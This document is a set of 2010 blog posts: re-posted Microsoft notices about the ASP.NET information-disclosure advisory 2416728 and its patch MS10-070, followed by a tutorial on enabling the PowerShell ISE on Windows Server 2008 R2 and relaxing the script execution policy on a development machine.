ASP.NET Security Patch

Last week I cross-posted, about a security flaw in ASP.NET which could allow an attacker to get access to files on the server.

Microsoft has announced an out-of-band patch for this on Tuesday, September 28, 2010.

Here is the blog post from the Microsoft SharePoint Team blog with details and links.

x-post from the Microsoft Security Response Center blog — The download links for the security updates are in the Security Bulletin.

As we announced yesterday, today we released Security Bulletin MS10-070 out-of-band to address a vulnerability in ASP.NET. The bulletin and the blog by Scott Guthrie, corporate vice president of Microsoft’s .NET Developer Platform are available for more information.

This security update addresses a vulnerability affecting all versions of the .NET Framework when used on Windows Server operating system. While desktop systems are listed as affected, consumers are not vulnerable unless they are running a web server from their computer.

The update will be made available initially only through the Microsoft Download Center and then released through Windows Update and Windows Server Update Services within the next few days. This allows customers the option to deploy it manually now without delaying for broader distribution.

For customers who use Automatic Updates, the update will be automatically applied once it is released broadly. Once the Security Update is applied, customers are protected against known attacks related to Security Advisory 2416728.

If you can, please join me and Dustin Childs today for a live webcast where we will cover the details of this bulletin and take customer questions live. Here is the registration information:

Date: Tuesday September 28, 2010
Time: 1:00 p.m. PDT
Click Here to Register

Thanks,
Dave Forstrom
Director, Trustworthy Computing

Advertisements

Big Security Hole for SharePoint Servers

You may have already read this somewhere out there, it is making the rounds across the Twitter-phere, blogs, and news. But I felt it would be important to post, or I should say re-post the issue.

Executive Summary from Vulnerability in ASP.NET Could Allow Information Disclosure (http://www.microsoft.com/technet/security/advisory/2416728.mspx)

Microsoft is investigating a new public report of a vulnerability in ASP.NET. An attacker who exploited this vulnerability could view data, such as the View State, which was encrypted by the target server, or read data from files on the target server, such as web.config. This would allow the attacker to tamper with the contents of the data. By sending back the altered contents to an affected server, the attacker could observe the error codes returned by the server. Microsoft is aware of limited, active attacks at this time. We are actively working with partners in our Microsoft Active Protections Program (MAPP) to provide information that they can use to provide broader protections to customers. Upon completion of this investigation, Microsoft will take the appropriate action to help protect our customers. This may include providing a security update through our monthly release process or providing an out-of-cycle security update, depending on customer needs.

Scott Guthrie has an excellent post up regarding this vulnerability at http://weblogs.asp.net/scottgu/archive/2010/09/18/important-asp-net-security-vulnerability.aspx. As normal, he has gone through with code snippets to explain the issue and what you can due to protect your systems.

Good luck keeping your systems safe!

PowerShell v2 ISE and Windows Server 2008 R2

After I have gotten my SQL Server installed, I decided the next step in building out the environment was to add some local users with different permissions for services and testing.

Instead of going through and manually clicking to add each of these new users, I decided why not learn a little more PowerShell. So the first thing I did was go to the ‘start globe’ (I know it is not the start menu, but the official/proper name escapes me plus I like the sound of ‘start globe’) and entered ‘PowerShell ISE’ in the search bar…..a few second later nothing, no results.

Since I was more concerned with developing, I went out and downloaded PowerGUI (http://powergui.org). Well, I have returned to the issue really wanting to use the built in ISE that is provided, so with some better googling I found an article on TechNet (http://technet.microsoft.com/en-us/library/dd759217.aspx) which provides an overview of the ISE for Window Server 2008 R2.

The article reviews what the PowerShell ISE is and why it is beneficial for both beginners and advance users. One of the last sentences contains the missing information I was looking for…" Windows PowerShell ISE is an optional feature." Now, I know why I couldn’t find it!!

So to get the ISE for use, the steps are simple and straight forward.

1. Open Server Manager

2. In the left-hand navigation tree select Features

a. clip_image002

3. Next click Add Features. This will launch the "Add Features Wizard"

a. clip_image004

4. Scroll down until you find Windows PowerShell Integrated Scripting Environment (ISE).

5. Click the check box and then click Next

6. Click Install

7. Now get up and do a few jumping-jacks to keep from getting leg clots, while the progress bar fills…..1…2…3…4…you can do 10, I have confidence in you.

8. Click Close once installation has finished.

9. A search for ISE now gives you two options

a. clip_image006

10. Now we can use the PowerShell ISE for development.

Now we can create scripts in a pretty environment, but what about running them. If you have just written a simple or for that matter complex script to perform some task, let’s say to write the all popular "Hello World!" to the screen. Your script might look like the following:

clip_image008

Now click the little green arrow or click F5. If your system is fresh the following error message most likely came up:

clip_image010

[For the search engine sake the message reads: File cannot be loaded because the execution of scripts is disabled on this system. Please see "get-help about_signing" for more details.]

Well, now this is a problem all we wanted to do was to greet the world from our machine….My understanding is that by default and for good reason PowerShell no matter what level user you are will not run a script that has not been digitally signed. You can run your PowerShell prompt as administrator and you will still get this message. It is a security feature to make sure you understand and know what you are about to run. This is great if you grandmother is about to run a script called ‘CatInTheCeiling.ps1’ because her friend told her it was the cutest thing in the world.

But for you and I, who actually want to accomplish some work on our development machine, this is a big slow down. We don’t want to spend the time trying to digitally sign a small PowerShell script.

The solution is quite simple, only a few steps:

1. Open a PowerShell command prompt or use the bottom window in the ISE.

2. Run this command: Set-ExecutionPolicy Unrestricted

3. Approve the warning

a. clip_image012

[For the search engine: The execution policy helps protect you from scripts that you do not trust.]

4. And you are done.

To reverse this setting use the Default option instead of Unrestricted.

For further details on the Set-ExecutionPolicy cmdlt check out its entry on MSDN at http://technet.microsoft.com/en-us/library/dd347628.aspx.